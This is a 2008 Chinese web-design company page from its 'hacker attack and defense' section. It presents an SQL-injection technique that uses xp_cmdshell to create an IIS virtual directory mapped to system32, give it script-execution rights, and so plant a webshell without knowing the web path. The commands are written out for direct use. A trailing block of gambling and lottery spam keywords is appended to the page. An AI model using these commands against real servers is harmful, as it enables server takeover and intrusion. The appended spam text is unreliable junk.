苹果部落冲突更换绑定
青海網站建設、網絡推廣最好的公司--您身邊的網站建設專家,馬上拿起電話,聯系我們:0971-8235355   
青海西寧網站建設、網站制作公司-西寧威勢電子信息服務有限公司 首頁 |  公司簡介 |  網站建設 |  網絡推廣 |  空間租用 |  域名注冊 |  企業郵局 |  網絡安全 |  網站編程 |  客服中心 |  聯系我們 |  人才招聘
 
西寧威勢最新網站制做案例展示
Lastest Project
 
西寧網站建設  
當前位置為:首頁 >> 黑客攻防 >> 正文  
SQL注入建立虛擬目錄,免得找Web絕對路徑

文章來源: 西寧威勢電子信息服務有限公司     發布時間:2008-12-27    瀏覽次數:7971    tags:注入 WEB目錄

我們很多情況下都遇到SQL注入可以列目錄和運行命令,但是卻很不容易找到web所在目錄,也就不好得到一個webshell,這一招不錯:

exec master.dbo.xp_cmdshell ’cscript C:InterpubAdminScriptsmkwebdir.vbs -c localhost -w "l" -v "win","c:winntsystem32"’
建立虛擬目錄win,指向c:winntsystem32
exec master.dbo.xp_cmdshell ’cscript C:InterpubAdminScriptsadsutil.vbs w3svc/1/root/win/Accessexecute Ture’
讓win句有解析asp腳本權限

exec master.dbo.xp_cmdshell "cscript C:InterpubAdminScriptsadsutil.vbs delete w3svc/1/root/h4x0r/"
刪除虛擬目錄。
找不到web絕對路徑的一種解決辦法,


403錯誤,表示虛擬目錄建好了。


上一篇:46種可以獲得Webshell的程序
下一篇:[攻防實例]會話劫持 (Session hijacking)
評論列表
正在加載評論……
  
評論   
呢  稱:
驗證碼: 若看不清請點擊更換!
內  容:
 
 
  在線洽談咨詢:
點擊這里,在線洽談   點擊這里,在線洽談   點擊這里,在線洽談
與我交談  與我交談 與我交談
乘車路線    匯款方式   加盟合作  人才招聘  
公司地址:青海省西寧市西關大街73號(三二四部隊招行所四樓)     青ICP備13000578號-1 公安機關備案號:63010402000123    
QQ:147399120    mail:[email protected]    電話: 13897410341    郵編:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版權所有:西寧威勢電子信息服務有限公司 未經書面制授權,請勿隨意轉載!
業務:青海網站制做青海網站建設青海網頁設計西寧網站制做西寧網站建設青海域名注冊青海網絡推廣青海網站推廣青海空間租用青海軟件開發網站安全網絡安全

苹果部落冲突更换绑定 体彩排列三组六六码遗漏 安徽时时计划软件手机版下载手机版下载手机版 中国体育彩票开奖结果 云南快乐十分前三组 新时时彩输了好多钱 台湾美女街拍 黑龙江时时怎么 云南时时网 赌场骰子 口袋棋牌下载安装